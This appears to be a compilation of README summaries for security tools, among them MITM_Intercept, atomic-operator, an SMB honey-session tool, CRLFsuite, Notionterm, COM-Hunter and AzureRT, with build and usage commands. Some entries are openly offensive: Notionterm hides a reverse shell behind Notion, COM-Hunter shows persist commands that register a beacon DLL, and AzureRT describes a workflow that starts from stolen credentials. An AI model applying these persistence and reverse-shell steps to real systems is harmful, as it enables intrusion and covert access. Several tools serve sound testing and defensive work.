We have CycloneDX and OWASP Dependency-check integrated to check dependencies for vulnerabilities. You can use the OWASP Dependency-checker by calling mvn dependency-check:aggregate and mvn cyclonedx:makeBom to use CycloneDX to create an SBOM.

Automatic reload during development

To make changes made load faster we added spring-dev-tools to the Maven project. To enable this in IntelliJ automatically, make sure:

  • Under Compiler -> Automatically build project is enabled, and
  • Under Advanced settings -> Allow auto-make to start even if developed application is currently running.

You can also manually invoke: Build -> Recompile the file you just changed, this will also force reloading of the application.

How to add a Challenge

Follow the steps below on adding a challenge:

  1. First make sure that you have an Issue reported for which a challenge is really wanted.
  2. Add the new challenge in the org.owasp.wrongsecrets.challenges folder. Make sure you add an explanation in src/main/resources/explanations and refer to it from your new Challenge class.
  3. Add a unit and integration test to show that your challenge is working.
  4. Don't forget to add @Order annotation to your challenge ;-).

If you want to move existing cloud challenges to another cloud: extend Challenge classes in the org.owasp.wrongsecrets.challenges.cloud package and make sure you add the required Terraform in a folder with the separate cloud identified. Make sure that the environment is added to org.owasp.wrongsecrets.RuntimeEnvironment. Collaborate with the others at the project to get your container running so you can test at the cloud account.



PowerGram - Multiplatform Telegram Bot In Pure PowerShell


PowerGram is a pure PowerShell Telegram Bot that can be run on Windows, Linux or Mac OS. To make use of it, you only need PowerShell 4 or higher and an internet connection.

All communication between the Bot and Telegram servers is encrypted with HTTPS, but all requests will be sent in GET method, so they could easily be intercepted.


Requirements

  • PowerShell 4.0 or greater

Download

It is recommended to clone the complete repository or download the zip file. You can do this by running the following command:

git clone https://github.com/JoelGMSec/PowerGram

Usage

.\PowerGram -h

____ ____
| _ \ __ __ __ __ _ __ / ___|_ __ __ _ _ __ ___
| |_) / _ \ \ /\ / / _ \ '__| | _| '__/ _' | '_ ' _ \
| __/ (_) \ V V / __/ | | |_| | | | (_| | | | | | |
|_| \___/ \_/\_/ \___|_| \____|_| \__,_|_| |_| |_|

------------------- by @JoelGMSec -------------------

Info: PowerGram is a pure PowerShell Telegram Bot
that can be run on Windows, Linux or Mac OS

Usage: PowerGram from PowerShell
.\PowerGram.ps1 -h Show this help message
.\PowerGram.ps1 -run Start PowerGram Bot

PowerGram from Telegram
/getid Get your Chat ID from Bot
/help Show all available commands

Warning: All commands will be sent using HTTPS GET requests
You need your Chat ID & Bot Token to run PowerGram

The detailed guide of use can be found at the following link:

https://darkbyte.net/powergram-un-sencillo-bot-para-telegram-escrito-en-powershell

License

This project is licensed under the GNU 3.0 license - see the LICENSE file for more details.

Credits and Acknowledgments

This tool has been created and designed from scratch by Joel GΓ‘mez Molina // @JoelGMSec

Contact

This software does not offer any kind of guarantee. Its use is exclusive for educational environments and / or security audits with the corresponding consent of the client. I am not responsible for its misuse or for any possible damage caused by it.

For more information, you can find me on Twitter as @JoelGMSec and on my blog darkbyte.net.



Zap-Scripts - Zed Attack Proxy Scripts For Finding CVEs And Secrets


Zed Attack Proxy Scripts for finding CVEs and Secrets.

Building

This project uses Gradle to build the ZAP add-on, simply run:

./gradlew build

in the main directory of the project, the add-on will be placed in the directory build/zapAddOn/bin/.


Usage

The easiest way to use this repo in ZAP is to add the directory to the scripts directory in ZAP (under Options -> Scripts).

however, you can also build the add on and install it (under File -> Load Addon File...).

License

This software is distributed under the MIT License.

Credits

  • The scripts under the active directory are mostly ported from the amazing nuclei-templates repository, so huge shoutout to projectdiscovery and the community.

  • secret-finder.js uses regex patterns from the awesome gitleaks project.

  • takeover-finder.js uses patterns from the awesome nuclei-templates repository.

LEGAL NOTICE

THIS SOFTWARE IS PROVIDED FOR EDUCATIONAL USE ONLY! IF YOU ENGAGE IN ANY ILLEGAL ACTIVITY THE AUTHOR DOES NOT TAKE ANY RESPONSIBILITY FOR IT. BY USING THIS SOFTWARE YOU AGREE WITH THESE TERMS.

Get Involved

Please, send us pull requests!



MITM_Intercept - A Little Bit Less Hackish Way To Intercept And Modify non-HTTP Protocols Through Burp And Others


A little bit less hackish way to intercept and modify non-HTTP protocols through Burp and others with SSL and TLS interception support. This tool is for researchers and applicative penetration testers that perform thick clients security assesments.

An improved version of the fantastic mitm_relay project.


The Story

As part of our work in the research department of CyberArk Labs, we needed a way to inspect SSL and TLS communication over TCP and have the option to modify the content of packets on the fly. There are many ways to do so (for example, the known Burp Suite extension NoPE), but none of them worked for us in some cases. In the end we stumbled upon mitm_relay.

mitm_relay is a quick and easy way to perform MITM of any TCP-based protocol through existing HTTP interception software like Burp Suite’s proxy. It is particularly useful for thick clients security assessments. But it didn’t completely work for us, so we needed to customize it. After a lot of customizations, every new change required a lot of work, and we ended up rewriting everything in a more modular way.

We hope that others will find this script helpful, and we hope that adding functionality will be easy.

How does it work

For a start, listeners’ addresses and ports need to be configured. For each listener, there also needs to be a target configured (address and port). Every data received from the listener will be wrapped into a body of an HTTP POST request with the URL containing β€œCLIENT_REQUEST”. Every data received from the target will be wrapped into a body of an HTTP POST request with the URL containing β€œSERVER_RESPONSE”. Those requests are sent to a local HTTP interception server.

There is the option to configure an HTTP proxy and use a tool like burp suite as an HTTP interception tool and view the messages there. This way, it is easy to modify the messages by using Burp’s β€œMatch and Replace”, extensions or even manually (Remember, the timeout mechanism of the intercepted protocol can be very short).

Another way to modify the messages is by using a python script that the HTTP interception server will run when it receives messages.

The body of the messages sent to the HTTP interception server will be printed to the shell. The messages will be printed after the changes if the modification script is given. After all the modifications, the interception server will also echo back as an HTTP response body.

To decrypt the SSL/TLS communication, mitm_intercept need to be provided a certificate and a key that the client will accept when starting a handshake with the listener. If the target server requires a specific certificate for a handshake, there is an option to give a certificate and a key.

A small chart to show the typical traffic flow:

Differences from mitm_relay

mitm_intercept is compatible with newer versions of python 3 (python 3.9) and is also compatible with windows (socket.MSG_DONTWAIT does not exist in windows, for example). We kept the option of using β€œSTARTTLS,” and we called it β€œMixed” mode. Using the SSL key log file is updated (the built-in option to use it is new from python 3.8), and we added the option to change the sni header. Now, managing incoming and outgoing communication is done by socketserver, and all the data is sent to a subclass of ThreadingHTTPServer that handle the data representation and modif ication. This way, it is possible to see the changes applied by the modification script in the response (convenient for using Burp). Also, we can now change the available ciphers that the script uses using the OpenSSL cipher list format

Prerequisites

  1. Python 3.9
  2. requests: $ python -m pip install requests

Usage

usage: mitm_intercept.py [-h] [-m] -l [u|t:]<interface>:<port> [[u|t:]<interface>:<port> ...] -t
[u|t:]<addr>:<port> [[u|t:]<addr>:<port> ...] [-lc <cert_path>]
[-lk <key_path>] [-tc <cert_path>] [-tk <key_path>] [-w <interface>:<port>]
[-p <addr>:<port>] [-s <script_path>] [--sni <server_name>]
[-tv <defualt|tls12|tls11|ssl3|tls1|ssl2>] [-ci <ciphers>]

mitm_intercept version 1.6

options:
-h, --help show this help message and exit
-m, --mix-connection Perform TCP relay without SSL handshake. If one of the relay sides starts an
SSL handshake, wrap the connection with SSL, and intercept the
communication. A listener certificate and private ke y must be provided.
-l [u|t:]<interface>:<port> [[u|t:]<interface>:<port> ...], --listen [u|t:]<interface>:<port> [[u|t:]<interface>:<port> ...]
Creates SSLInterceptServer listener that listens on the specified interface
and port. Can create multiple listeners with a space between the parameters.
Adding "u:" before the address will make the listener listen in UDP
protocol. TCP protocol is the default but adding "t:" for cleanliness is
possible. The number of listeners must match the number of targets. The i-th
listener will relay to the i-th target.
-t [u|t:]<addr>:<port> [[u|t:]<addr>:<port> ...], --target [u|t:]<addr>:<port> [[u|t:]<addr>:<port> ...]
Directs each SSLInterceptServer listener to forward the communication to a
target address and port. Can create multiple targets with a space between
the parameters. Adding "u:" before the address will make the target
communicate in UDP protocol.TCP protocol is the default but adding "t:" for
cleanliness is possible. The number of listeners must match the number of
targets. The i-th listener will relay to the i-th target.
-lc <cert_path>, --listener-cert <cert_path>
The certificate that the listener uses when a client contacts him. Can be a
self-sign certificate if the client will accept it.
-lk <key_path>, --listener-key <key_path>
The private key path for the listener certificate.
-tc <cert_path>, --target-cert <cert_path>
The certificate that used to create a connection with the target. Can be a
self-sign certificate if the target will accept it. Doesn't necessary if the
target doesn't require a specific certificate.
-tk <key_path>, --target-key <key_path>
The private key path for the target certificate.
-w <interface>:<port>, --webserver <interface>:<port>
Specifies the interface and the port the InterceptionServer webserver will
listens on. If omitted the default is 127.0.0.1:49999
-p <addr>:<port>, --proxy <addr>:<port>
Specifies the address and the port of a proxy between the InterceptionServer
webserver and the SSLInterceptServer. Can be configured so the communication
will go through a l ocal proxy like Burp. If omitted, the communication will
be printed in the shell only.
-s <script_path>, --script <script_path>
A path to a script that the InterceptionServer webserver executes. Must
contain the function handle_request(message) that will run before sending it
to the target or handle_response(message) after receiving a message from the
target. Can be omitted if doesn't necessary.
--sni <server_name> If there is a need to change the server name in the SSL handshake with the
target. If omitted, it will be the server name from the handshake with the
listener.
-tv <defualt|tls12|tls11|ssl3|tls1|ssl2>, --tls-version <defualt|tls12|tls11|ssl3|tls1|ssl2>
If needed can be specified a specific TLS version.< br/> -ci <ciphers>, --ciphers <ciphers>
Sets different ciphers than the python defaults for the TLS handshake. It
should be a string in the OpenSSL cipher list format
(https://www.openssl.org/docs/manmaster/man1/ciphers.html).

For dumping SSL (pre-)master secrets to a file, set the environment variable SSLKEYLOGFILE with a
file path. Useful for Wireshark.

The communication needs to be directed to the listener for intercepting arbitrary protocols. The way to do so depends on how the client operates. Sometimes it uses a DNS address, and changing the hosts file will be enough to resolve the listener address. If the address is hard-coded, then more creative ways need to be applied (usually some modifications of the routing table, patching the client, or using VM and iptables).

Modification Script

The HTTP interception server can run a script given to it with the flag -s. This script runs when the HTTP requests are received. The response from the HTTP interception server is the received request after running the script.

When a proxy is configured (like Burp), modifications of the request will happen before the script runs, and modifications on the response will be after that. Alterations on the request and the response by the proxy or the modification script will change the original message before going to the destination.

The script must contain the functions handle_request(message) and handle_response(message). The HTTP interception server will call handle_request(message) when the message is from the client to the server and handle_response(message) when the message is from the server to the client.

An example of a script that adds a null byte at the end of the message:

def handle_request(message):
return message + b"\x00"

def handle_response(message):
# Both functions must return a message.
return message

Certificates

The tool requires a server certificate and a private key for SSL interception. Information about generating a self-signed certificate or Burp’s certificate can be found here.

If the server requires a specific certificate, a certificate and a key can be provided to the tool.

Demo

The demo below shows how to intercept a connection with MSSQL (this demo was performed on DVTA):

mitm_intercept_mssql_with_text.mp4

Connection to MSSQL is made by TDS protocl on top of TCP. The authentication itself is performed with TLS on top of the TDS protocol. To see intercept that TLS process, we will need two patchy modification scripts.

demo_script.py:

from time import time
from struct import pack
from pathlib import Path


def handle_request(message):

if message.startswith(b"\x17\x03"):
return message

with open("msg_req" + str(time()), "wb") as f:
f.write(message[:8])

return message[8:]


def handle_response(message):

if message.startswith(b"\x17\x03"):
return message

path = Path(".")
try:
msg_res = min(i for i in path.iterdir() if i.name.startswith("msg_res"))
data = msg_res.read_bytes()
msg_res.unlink()
except ValueError:
data = b'\x12\x01\x00\x00\x00\x00\x01\x00'

return data[:2] + pack(">h", len(message)+8) + data[4:] + message

demo_script2.py:

from time import time
from struct import pack
from pathlib import Path

def handle_request(message):

if message.startswith(b"\x17\x03"):
return message

path = Path(".")
try:
msg_req = min(i for i in path.iterdir() if i.name.startswith("msg_req"))
data = msg_req.read_bytes()
msg_req.unlink()
except ValueError:
data = b'\x12\x01\x00\x00\x00\x00\x01\x00'


return data[:2] + pack(">h", len(message)+8) + data[4:] + message


def handle_response(message):

if message.startswith(b"\x17\x03"):
return message

with open("msg_res" + str(time()), "wb") as f:
f.write(message[:8])

return message[8:]

We will see some of the TLS communication with those patchy scripts, but then the client will fail (because with those hacky scripts, we badly alter the TDS communication except the TLS part).

mitm_intercept_mssql_tls.mp4

License

Copyright (c) 2022 CyberArk Software Ltd. All rights reserved
This repository is licensed under Apache-2.0 License - see LICENSE for more details.



Notionterm - Embed Reverse Shell In Notion Pages

Embed reverse shell in Notion pages.
Hack while taking notes

FOR:

  • Hiding attacker IP in reverse shell (No direct interaction between attacker and target machine. Notion is used as a proxy hosting the reverse shell)
  • Demo/Quick proof insertion within report
  • High available and shareable reverse shell (desktop, browser, mobile)
  • Encrypted and authenticated remote shell

NOT FOR:

  • Long and interactive shell session (see tacos for that)

Why?

The focus was on making something fun while still being usable, but that's not meant to be THE solution for reverse shell in the pentester's arsenal

How?

Just use notion as usual and launch notionterm on target.

Requirements

  • Notion software and API key
  • Allowed HTTP communication from the target to the notion domain
  • Prior RCE on target

roughly inspired by the great idea of OffensiveNotion and notionion!

Quickstart

Set-up

  1. Create a page and give to the integration API key the permissions to have page write access
  2. Build notionterm and transfer it on target machine (see install)


Run

There are 3 main ways to run notionterm:

"normal" mode
Get terminal, stop/unstop it, etc...
notionterm [flags]
Start the shell with the button widget: turn ON, do you reverse shell stuff, turn OFF to pause, turn ON to resume etc...
"server" mode
Ease notionterm embedding in any page
notionterm --server [flags]
Start a shell session in any page by creating an embed block with URL containing the page id (CTRL+Lto get it): https://[TARGET_URL]/notionterm?url=[NOTION_PAGE_ID].
light mode
Only perform HTTP traffic from target β†’ notion
notionterm light [flags]

Install

As notionterm is aimed to be run on target machine it must be built to fit with it.

Thus set env var to fit with the target requirement:

GOOS=[windows/linux/darwin]

Simple build

git clone https://github.com/ariary/notionterm.git && cd notionterm
GOOS=$GOOS go build notionterm.go

You will need to set API key and notion page URL using either env var (NOTION_TOKEN & NOTION_PAGE_URL) or flags (--token & --page-url)

"All-inclusive" build

Embed directly the notion integration API token and notion page url in the binary.

everybody with access to the binary can retrieved the token. For security reason don't share it and remove it after use.

Set according env var:

export NOTION_PAGE_URL=[NOTION_PAGE_URL]
export NOTION_TOKEN=[INTEGRATION_NOTION_TOKEN]

And build it:

git clone https://github.com/ariary/notionterm.git && cd notionterm
./static-build.sh $NOTION_PAGE_URL $NOTION_TOKEN $GOOS go build notionterm.go


Atomic-Operator - A Python Package Is Used To Execute Atomic Red Team Tests (Atomics) Across Multiple Operating System Environments


This python package is used to execute Atomic Red Team tests (Atomics) across multiple operating system environments.

(What's new?)

Β 

Why?

atomic-operator enables security professionals to test their detection and defensive capabilities against prescribed techniques defined within atomic-red-team. By utilizing a testing framework such as atomic-operator, you can identify both your defensive capabilities as well as gaps in defensive coverage.

Additionally, atomic-operator can be used in many other situations like:

  • Generating alerts to test products
  • Testing EDR and other security tools
  • Identifying way to perform defensive evasion from an adversary perspective
  • Plus more.

Features

  • Support local and remote execution of Atomic Red Teams tests on Windows, macOS, and Linux systems
  • Supports running atomic-tests against iaas:aws
  • Can prompt for input arguments but not required
  • Assist with downloading the atomic-red-team repository
  • Can be automated further based on a configuration file
  • A command-line and importable Python package
  • Select specific tests when one or more techniques are specified
  • Plus more

Getting Started

atomic-operator is a Python-only package hosted on PyPi and works with Python 3.6 and greater.

If you are wanting a PowerShell version, please checkout Invoke-AtomicRedTeam.

pip install atomic-operator

The next steps will guide you through setting up and running atomic-operator.

Installation

You can install atomic-operator on OS X, Linux, or Windows. You can also install it directly from the source. To install, see the commands under the relevant operating system heading, below.

Prerequisites

The following libraries are required and installed by atomic-operator:

pyyaml==5.4.1
fire==0.4.0
requests==2.26.0
attrs==21.2.0
pick==1.2.0

macOS, Linux and Windows:

pip install atomic-operator

macOS using M1 processor

git clone https://github.com/swimlane/atomic-operator.git
cd atomic-operator

# Satisfy ModuleNotFoundError: No module named 'setuptools_rust'
brew install rust
pip3 install --upgrade pip
pip3 install setuptools_rust

# Back to our regularly scheduled programming . . .
pip install -r requirements.txt
python setup.py install

Installing from source

git clone https://github.com/swimlane/atomic-operator.git
cd atomic-operator
pip install -r requirements.txt
python setup.py install

Usage example (command line)

You can run atomic-operator from the command line or within your own Python scripts. To use atomic-operator at the command line simply enter the following in your terminal:

atomic-operator --help
atomic-operator run -- --help

Please note that to see details about the run command run atomic-operator run -- --help and NOT atomic-operator run --help

Retrieving Atomic Tests

In order to use atomic-operator you must have one or more atomic-red-team tests (Atomics) on your local system. atomic-operator provides you with the ability to download the Atomic Red Team repository. You can do so by running the following at the command line:

atomic-operator get_atomics 
# You can specify the destination directory by using the --destination flag
atomic-operator get_atomics --destination "/tmp/some_directory"

Running Tests Locally

In order to run a test you must provide some additional properties (and options if desired). The main method to run tests is named run.

# This will run ALL tests compatiable with your local operating system
atomic-operator run --atomics-path "/tmp/some_directory/redcanaryco-atomic-red-team-3700624"

You can select individual tests when you provide one or more specific techniques. For example running the following on the command line:

atomic-operator run --techniques T1564.001 --select_tests

Will prompt the user with a selection list of tests associated with that technique. A user can select one or more tests by using the space bar to highlight the desired test:

 Select Test(s) for Technique T1564.001 (Hide Artifacts: Hidden Files and Directories)

* Create a hidden file in a hidden directory (61a782e5-9a19-40b5-8ba4-69a4b9f3d7be)
Mac Hidden file (cddb9098-3b47-4e01-9d3b-6f5f323288a9)
Create Windows System File with Attrib (f70974c8-c094-4574-b542-2c545af95a32)
Create Windows Hidden File with Attrib (dadb792e-4358-4d8d-9207-b771faa0daa5)
Hidden files (3b7015f2-3144-4205-b799-b05580621379)
Hide a Directory (b115ecaf-3b24-4ed2-aefe-2fcb9db913d3)
Show all hidden files (9a1ec7da-b892-449f-ad68-67066d04380c)

Running Tests Remotely

In order to run a test remotely you must provide some additional properties (and options if desired). The main method to run tests is named run.

# This will run ALL tests compatiable with your local operating system
atomic-operator run --atomics-path "/tmp/some_directory/redcanaryco-atomic-red-team-3700624" --hosts "10.32.1.0" --username "my_username" --password "my_password"

When running commands remotely against Windows hosts you may need to configure PSRemoting. See details here: Windows Remoting

Additional parameters

You can see additional parameters by running the following command:

atomic-operator run -- --help
Parameter Name Type Default Description
techniques list all One or more defined techniques by attack_technique ID.
test_guids list None One or more Atomic test GUIDs.
select_tests bool False Select one or more atomic tests to run when a techniques are specified.
atomics_path str os.getcwd() The path of Atomic tests.
check_prereqs bool False Whether or not to check for prereq dependencies (prereq_comand).
get_prereqs bool False Whether or not you want to retrieve prerequisites.
cleanup bool False Whether or not you want to run cleanup command(s).
copy_source_files bool True Whether or not you want to copy any related source (src, bin, etc.) files to a remote host.
command_timeout int 20 Time duration for each command before timeout.
debug bool False Whether or not you want to output details about tests being ran.
prompt_for_input_args bool False Whether you want to prompt for input arguments for each test.
return_atomics bool False Whether or not you want to return atomics instead of running them.
config_file str None A path to a conifg_file which is used to automate atomic-operator in environments.
config_file_only bool False Whether or not you want to run tests based on the provided config_file only.
hosts list None A list of one or more remote hosts to run a test on.
username str None Username for authentication of remote connections.
password str None Password for authentication of remote connections.
ssh_key_path str None Path to a SSH Key for authentication of remote connections.
private_key_string str None A private SSH Key string used for authentication of remote connections.
verify_ssl bool False Whether or not to verify ssl when connecting over RDP (windows).
ssh_port int 22 SSH port for authentication of remote connections.
ssh_timeout int 5 SSH timeout for authentication of remote connections.
**kwargs dict None If additional flags are passed into the run command then we will attempt to match them with defined inputs within Atomic tests and replace their value with the provided value.

You should see a similar output to the following:

NAME
atomic-operator run - The main method in which we run Atomic Red Team tests.

SYNOPSIS
atomic-operator run <flags>

DESCRIPTION
The main method in which we run Atomic Red Team tests.

FLAGS
--techniques=TECHNIQUES
Type: list
Default: ['all']
One or more defined techniques by attack_technique ID. Defaults to 'all'.
--test_guids=TEST_GUIDS
Type: list
Default: []
One or more Atomic test GUIDs. Defaults to None.
--select_tests=SELECT_TESTS
Type: bool
Default: False
Select one or more tests from provided techniques. Defaults to False.
--atomics_path=ATOMICS_PATH
Default: '/U...
The path of Atomic tests. Defaults to os.getcwd().
--check_prereqs=CHECK_PREREQS
Default: False
Whether or not to check for prereq dependencies (pr ereq_comand). Defaults to False.
--get_prereqs=GET_PREREQS
Default: False
Whether or not you want to retrieve prerequisites. Defaults to False.
--cleanup=CLEANUP
Default: False
Whether or not you want to run cleanup command(s). Defaults to False.
--copy_source_files=COPY_SOURCE_FILES
Default: True
Whether or not you want to copy any related source (src, bin, etc.) files to a remote host. Defaults to True.
--command_timeout=COMMAND_TIMEOUT
Default: 20
Timeout duration for each command. Defaults to 20.
--debug=DEBUG
Default: False
Whether or not you want to output details about tests being ran. Defaults to False.
--prompt_for_input_args=PROMPT_FOR_INPUT_ARGS
Default: False
Whether you want to prompt for input arguments for each test. Defaults to False.
--return_atomics=RETURN_ATOMICS
Default: False
Whether or not you want to return atomics instead of running them. Defaults to False.
--config_file=CONFIG_FILE
Type: Optional[]
Default: None
A path to a conifg_file which is used to automate atomic-operator in environments. Default to None.
--config_file_only=CONFIG_FILE_ONLY
Default: False
Whether or not you want to run tests based on the provided config_file only. Defaults to False.
--hosts=HOSTS
Default: []
A list of one or more remote hosts to run a test on. Defaults to [].
--username=USERNAME
Type: Optional[]
Default: None
Username for authentication of remote connections. Defaults to None.
--password=PASSWORD
Type: Optional[]
Default: None
Password for authentication of remote connections. Defaults to None.
--ssh_key_path=SSH_KEY_PATH
Type: Optional[]
Default: None
Path to a SSH Key for authentication of remote connections. Defaults to None.
--private_key_string=PRIVATE_KEY_STRING
Type: Optional[]
Default: None
A private SSH Key string used for authentication of remote connections. Defaults to None.
--verify_ssl=VERIFY_SSL
Default: False
Whether or not to verify ssl when connecting over RDP (windows). Defaults to False.
--ssh_port=SSH_PORT
Default: 22
SSH port for authentication of remote connections. Defaults to 22.
--ssh_timeout=SSH_TIMEOUT
Default: 5
SSH timeout for authentication of remote connections. Defaults to 5.
Additional flags are accepted.
If provided, keys matching inputs for a test will be replaced. Default is None.

Running atomic-operator using a config_file

In addition to the ability to pass in parameters with atomic-operator you can also pass in a path to a config_file that contains all the atomic tests and their potential inputs. You can see an example of this config_file here:

atomic_tests:
- guid: f7e6ec05-c19e-4a80-a7e7-241027992fdb
input_arguments:
output_file:
value: custom_output.txt
input_file:
value: custom_input.txt
- guid: 3ff64f0b-3af2-3866-339d-38d9791407c3
input_arguments:
second_arg:
value: SWAPPPED argument
- guid: 32f90516-4bc9-43bd-b18d-2cbe0b7ca9b2

Usage example (scripts)

To use atomic-operator you must instantiate an AtomicOperator object.

from atomic_operator import AtomicOperator

operator = AtomicOperator()

# This will download a local copy of the atomic-red-team repository

print(operator.get_atomics('/tmp/some_directory'))

# this will run tests on your local system
operator.run(
technique: str='All',
atomics_path=os.getcwd(),
check_dependencies=False,
get_prereqs=False,
cleanup=False,
command_timeout=20,
debug=False,
prompt_for_input_args=False,
**kwargs
)

Getting Help

Please create an issue if you have questions or run into any issues.

Built With

  • carcass - Python packaging template

Contributing

Please read CONTRIBUTING.md for details on our code of conduct, and the process for submitting pull requests to us.

Versioning

We use SemVer for versioning.

Authors

See also the list of contributors who participated in this project.

License

This project is licensed under the MIT License - see the LICENSE file for details

Shoutout

  • Thanks to keithmccammon for helping identify issues with macOS M1 based proccesssor and providing a fix


SMB-Session-Spoofing - Tool To Create A Fake SMB Session


Welcome! This is a utility that can be compiled with Visual Studio 2019 (or newer). The goal of this program is to create a fake SMB Session. The primary purpose of this is to serve as a method to lure attackers into accessing a honey-device. This program comes with no warranty or guarantees.


Program Modifications Instructions

This program will require you to modify the code slightly. On line 144, the Windows API CreateProcessWithLogonW API is called, there are two parameters that have been supplied by default - svc-admin (the Username) and contoso.com (the domain). It is necessary that you change these values to something that matches your production network.

CreateProcessWithLogonW(L"DomainAdminUser", L"YourDomain.com", NULL, LOGON_NETCREDENTIALS_ONLY, <snip>);

Implementation Instructions

After modifying the code and compiling it, you must then install the service. You can do so with the following command:

sc create servicename binpath="C:\ProgramData\Services\Inject\service.exe" start="auto"

Verification Steps

To verify the program is functioning correctly, you should check and see what sessions exist on the system. This can be done with the following command:

C:\ProgramData\Services\Inject> net sessions
Computer User name Client Type Opens Idle time

-------------------------------------------------------------------------------
\\[::1] svc-admin 0 00:00:04
The command completed successfully.

You should check back in about 13 minutes to verify that a new session has been created and the program is working properly.

What an Attacker Sees

The theory behind this is when an adversary runs SharpHound and collects sessions and analyzes attack paths from owned principals, they can identify that a high privileged user is signed in on Tier-2 infrastructure (Workstations), which (it appears) they can then access and dump credentials on to gain Domain Admin access.

Β  Β 

Β In the scenario above, an attacker has compromised the user "wadm-tom@contoso.com" who is a Local Administrator on lab-wkst-2.contoso.com. The user svc-admin is logged in on lab-wkst-2.contoso.com, meaning that all the attacker has to do is sign into the Workstation, run Mimikatz and dump credentials. So, how do you monitor for this?

How you Should Configure Monitoring

Implementation of this tool is important, so is monitoring. If you implement the tool with no monitoring, it is effectively useless; therefore monitoring is a must. The most effective way to monitor this host is to alert on any logon. This program is best utilized on a host with no user activity that is joined to the domain with standard corporate monitoring tools (EDR, AV, Windows Event Log Forwarding, etc). It is highly recommended that you have an email alert, SMS alert, and many others if possible to ensure that incidents involving this machine are triaged as quickly as possible since this has the highest probability for a real adversary to engage with the workstation in question.

Credits

Thank you to Microsoft for providing the service template code and for the excellent Windows API Documentation.



CRLFsuite - Fast CRLF Injection Scanning Tool


CRLFsuite is a fast tool specially designed to scanΒ CRLF injection.


Installation

$ git clone https://github.com/Nefcore/CRLFsuite.git
$ cd CRLFsuite
$ sudo python3 setup.py install
$ crlfsuite -h

Features

  • Single URL scanning
  • Multiple URL scanning
  • Stdin supported
  • GET & POST method supported
  • Concurrency
  • Best Payloads list
  • Headers supported
  • Fast and efficient scanning with negligible false-positive

Usage

Single URL scanning:

$ crlfsuite -u "http://testphp.vulnweb.com"

Multiple URLs scanning:

$ crlfsuite -i targets.txt

from stdin:

$ subfinder -d google.com -silent | httpx -silent | crlfsuite -s

Specifying cookies

οͺ
:
$ crlfsuite -u "http://testphp.vulnweb.com" --cookies "key=val; newkey=newval"

Using POST method:

$ crlfsuite -i targets.txt -m POST -d "key=val&newkey=newval"

Bug report

If You're facing some errors or issues with this tool, you can open a issue here:

Open a issue

COM-Hunter - COM Hijacking VOODOO


COM Hijacking VOODOO

COM-hunter is a COM Hijacking persistnce tool written in C#.

This tool was inspired during the RTO course of @zeropointsecltd


Features

  • Finds out entry valid CLSIDs in the victim's machine.
  • Finds out valid CLSIDs via Task Scheduler in the victim's machine.
  • Finds out if someone already used any of those valid CLSIDs in order to do COM persistence (LocalServer32/InprocServer32).
  • Finds out if someone already used any of valid CLSID via Task Scheduler in order to do COM persistence (LocalServer32/InprocServer32).
  • Tries to do automatically COM Hijacking Persistence with general valid CLSIDs (LocalServer32/InprocServer32).
  • Tries to do automatically COM Hijacking Persistence via Task Scheduler.
  • Tries to use "TreatAs" key in order to refere to a different component.

Special Thanks

License

Copyright (c) 2022 Nikos Vourdas

Under the COM Hijacking VOODOO (1)

.NET Framework

4.8

Usage

[+] Usage:

.\COM-Hunter.exe <mode> <options>

-> General Options:
-h, --help Shows help and exits.
-v, --version Shows current version and exits.
-a, --about Shows info, credits about the tool and exits.

-> Modes:
Search Search Mode
Persist Persist Mode

-> Search Mode:
Get-Entry Searches for valid CLSIDs entries.
Get-Tasksch Searches for valid CLSIDs entries via Task Scheduler.
Find-Persist Searches if someone already used a valid CLSID (Defence).
Find-Tasksch Searches if someone already used a valid CLSID via Task Scheduler (Defence).

-> Persist Mode:
General Uses General method to apply COM Hijacking Persistence in Registry.
Tasksch Try to do COM Hijacking Persistence via Task Scheduler.
TreatAs Uses TreatAs Registry key to apply COM Hijacking Persistence in Registry.

-> General Usage:
.\COM-Hunter.exe Persist General <clsid> <full_path_of_evil_dll>

-> Tasksch Usage:
.\COM-Hunter.exe Persist Tasksch <full_path_of_evil_dll>

-> TreatAs Usage:
.\COM-Hunter.exe Persist TreatAs <clsid> <full_path_of_evil_dll>

Example Usages

  • Get-Entry (Search Mode):

    .\COM-Hunter.exe Search Get-Entry
  • Find-Persist (Search Mode):

    .\COM-Hunter.exe Search Find-Persist
  • General (Persist Mode):

    .\COM-Hunter.exe Persist General 'HKCU:Software\Classes\CLSID\...' C:\Users\nickvourd\Desktop\beacon.dll
  • Tasksch (Persist Mode):

    .\COM-Hunter.exe Persist Tasksch C:\Users\nickvourd\Desktop\beacon.dll

Example Format Valid CLSIDs

Software\Classes\CLSID\...
HKCU:Software\Classes\CLSID\...
HKCU:\Software\Classes\CLSID\...
HKCU\Software\Classes\CLSID\...
HKEY_CURRENT_USER:Software\Classes\CLSID\...
HKEY_CURRENT_USER:\Software\Classes\CLSID\...
HKEY_CURRENT_USER\Software\Classes\CLSID\...


AzureRT - A Powershell Module Implementing Various Azure Red Team Tactics


Powershell module implementing various cmdlets to interact with Azure and Azure AD from an offensive perspective.

Helpful utilities dealing with access token based authentication, switching from Az to AzureAD and az cli interfaces, easy to use pre-made attacks such as Runbook-based command execution and more.


The Most Valuable Cmdlets

This toolkit brings lots of various cmdlets. This section highlights the most important & useful ones.

Typical Red Team / audit workflow starting with stolen credentials can be summarised as follows:

Credentials Stolen -> Authenticate to Azure/AzureAD -> find whether they're valid -> find out what you can do with them

The below cmdlets are precisely suited to help you follow this sequence:

  1. Connect-ART - Offers various means to authenticate to Azure - credentials, PSCredential, token

  2. Connect-ARTAD - Offers various means to authenticate to Azure AD - credentials, PSCredential, token

  3. Get-ARTWhoami - When you authenticate - run this to check whoami and validate your access

  4. Get-ARTAccess - Then, when you know you have access - find out what you can do & what's possible by performing Azure situational awareness

  5. Get-ARTADAccess - Similarly you can find out what you can do scoped to Azure AD.


Use Cases

Cmdlets implemented in this module came helpful in following use & attack scenarios:

  • Juggling with access tokens from Az to AzureAD and back again.
  • Nicely print authentication context (aka whoami) in Az, AzureAD, Microsoft.Graph and az cli at the same time
  • Display available permissions granted to the user on a target Azure VM
  • Display accessible Azure Resources along with permissions we have against them
  • Easily read all accessible Azure Key Vault secrets
  • Authenticate as a Service Principal to leverage Privileged Role Administrator role assigned to that Service Principal
  • Execute attack against Azure Automation via malicious Runbook

Installation

This module depends on Powershell Az and AzureAD modules pre-installed. Microsoft.Graph and az cli are optional but nonetheless really useful. Before one starts crafting around Azure, following commands may be used to prepare one's offensive environment:

Install-Module Az -Force -Confirm -AllowClobber -Scope CurrentUser
